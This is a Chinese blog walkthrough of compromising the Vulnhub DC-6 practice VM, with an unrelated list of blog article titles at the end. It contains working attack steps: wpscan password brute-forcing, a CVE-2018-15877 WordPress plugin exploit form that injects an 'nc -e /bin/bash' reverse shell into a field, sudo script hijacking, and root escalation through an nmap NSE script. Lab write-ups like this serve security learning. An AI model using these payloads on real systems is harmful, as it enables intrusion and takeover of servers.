Vulnhub DC-6靶机渗透
信息搜集
nmap -sP 192.168.146.0/24 #找靶机ip
nmap -sS -Pn -A 192.168.146.143 #扫描靶机信息
22和80端口,老朋友了。
先直接访问http://192.168.146.143/,显示http://wordy/。
在C:\Windows\System32\drivers\etc下的HOSTS文件中增加192.168.146.143 wordy
又是wp,直接上wpscan扫描。
wpscan --url http://wordy/ -e u #爆破用户名
爆破出5个用户名admin,jens,graham,sarah,mark
再爆破密码,直接用kali自带的/usr/share/wordlists/rockyou.txt(估计要跑几天)
然后逛逛官网看到了提示
直接冲
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt #提取字典中有k01的数据
wpscan --url http://wordy/ -U admin,jens,graham,sarah,mark -P passwords.txt
#Username: mark, Password: helpdesk01
getFlag
用获得的账号在http://wordy/wp-login.php登陆
浏览下,发现一个可疑的功能Activity monitor,直接searchsploit搜索下。
看到一个很符合的,再看看他的html文件。
<html>
<!-- Wordpress Plainview Activity Monitor RCE
[+] Version: 20161228 and possibly prior
[+] Description: Combine OS Commanding and CSRF to get reverse shell
[+] Author: LydA(c)ric LEFEBVRE
[+] CVE-ID: CVE-2018-15877
[+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
[+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
-->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
<input type="hidden" name="lookup" value="Lookup" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
看来是一个命令执行了,直接提取到poc.html文件,改下action和执行的命令就可以用了。
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ip" value="google.fr | nc 192.168.146.143 -e /bin/bash" />
<input type="hidden" name="lookup" value="Lookup" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
攻击机 nc -lvvp 4444
成功getshell
python -c 'import pty; pty.spawn("/bin/bash") #使用交互式命令行'
接下来同样思路,先去看看/home下的几个用户。
在mark目录下发现工作日志,里面也有gramham的密码。
su graham #直接切换用户,密码GSo7isUM1D4
然后再浏览下其他三个用户的东西,没发现什么。
这时候考虑提权看看 sudo -l
,发现可以免密执行jens的命令 /home/jens/backups.sh
这里的backups我们是可以写的。
那么执行这个脚本的时候会以jens用户来执行,方法:sudo -u jens /home/jens/backups.sh
我们让jens执行/bin/bash不就直接得到了jens的shell了吗?
echo "/bin/bash" > backups.sh #写入文件
sudo -u jens /home/jens/backups.sh
sudo -l #在看看有什么sudo权限
emmm.....可以以root身份运行nmap,nmap能干的事很多来着。。。搜索一下。
主要有两种方法:使用--interactive选项,或者写一个nse脚本
参考p牛的文章:https://www.leavesongs.com/PENETRATION/linux-suid-privilege-escalation.html
这里的nmap比较新没有--interactive选项了,所以从nse脚本入手
echo 'os.execute("/bin/sh")' > A1oe.nse #写脚本
sudo /usr/bin/nmap --script=/home/jens/A1oe.nse #使用nmap
拿到flag
总结
本次靶机也并不难,主要自己走了一遍nmap提权。
主要有两个方法:--interactive选项还有nse脚本。
最新文章
- 调度系统任务创建---创建一个JoinTrigger的依赖任务(五)
- CentOS7配置双网卡绑定
- Spring中RedirectAttributes对象重定向传参
- [每日一题] 11gOCP 1z0-052 :2013-09-19 创建用户...................................................B41
- Broadcast详解
- ubuntu 16.04环境配置
- WCF消息交换模式之双工通讯(Duplex)
- C++彩色数据流动界面
- 什么是TNB?如何买TNB?
- 卷积神经网络之VGG
- MySql中插入乱码问题解决
- 浅谈User Information List
- 【漏洞预警】Intel爆CPU设计问题,导致win和Linux内核重设计(附测试poc)
- 【Linux】数组与关联数组
- 第四章 Spring.Net 如何管理您的类___对象的作用域
- JS四种方法去除字符串最后的逗号
- MySql指令大全(转载)
- 深入理解Javascript中构造函数和原型对象的区别(转存)
- Vue教程:指令与事件(二)
- initerrlog: 无法打开错误日志文件 &#39;D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log 解决办法
热门文章
- JDk下载和环境变量Path的配置
- ASP.NET Core ActionFilter引发的一个EF异常
- 4000字干货长文!从校招和社招的角度说说如何准备Java后端大厂面试?
- js Vquery
- textareaCenter 未完结 其实就是iview的textarea的从写一遍 需求是光标上下居中
- 覆盖io.spring.platform管理的版本号
- 解开Service Mesh的神秘面纱
- C/C++、C#、JAVA(二):基本类型和转换操作
- spring最核心思想--ioc控制反转
- Python中保留两位小数的几种方法